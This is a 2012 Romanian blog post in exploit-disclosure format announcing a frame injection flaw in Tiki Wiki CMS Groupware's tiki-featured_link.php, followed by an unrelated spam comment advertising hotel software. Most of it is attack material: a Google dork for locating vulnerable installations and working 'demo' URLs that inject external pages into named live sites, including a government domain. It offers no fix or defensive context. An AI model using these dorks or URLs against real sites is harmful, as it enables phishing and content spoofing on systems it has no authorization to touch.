vineri, 17 februarie 2012

Tiki Wiki CMS Groupware Frame Injection

# Exploit Title: Tiki Wiki CMS Groupware Frame Injection
# Date: 17.02.2012
# Author: Sony

# Software Link: http://info.tiki.org/tiki-index.php
# Google Dorks: inurl:tiki-featured_link.php?type=
# Web Browser : Mozilla Firefox

# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html
..................................................................


We have Frame Injection in the Tiki Wiki CMS Groupware.

Demo:

http://stats.tiki.org/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com


http://wiki.lxcenter.org/tiki-featured_link.php?type=f&url=http://insecurity.ro/forum/index.php

http://www.maps.gov.ck/tiki-featured_link.php?type=f&url=http://insecurity.ro/forum/index.php

etc..

1 comentarii:

POS Software spunea...

It may be school ,college, office, industry, home, shop, everywhere now software has been used for easy processing and vast amount of data can store and retrieve very easily. So hotel is one of the area where that also need to have keep various data and it also need of retrieving. To make simple of that hotel system there also need hotel software.. Hotel Software

Trimiteţi un comentariu

Reţineţi: Numai membrii acestui blog pot posta comentarii.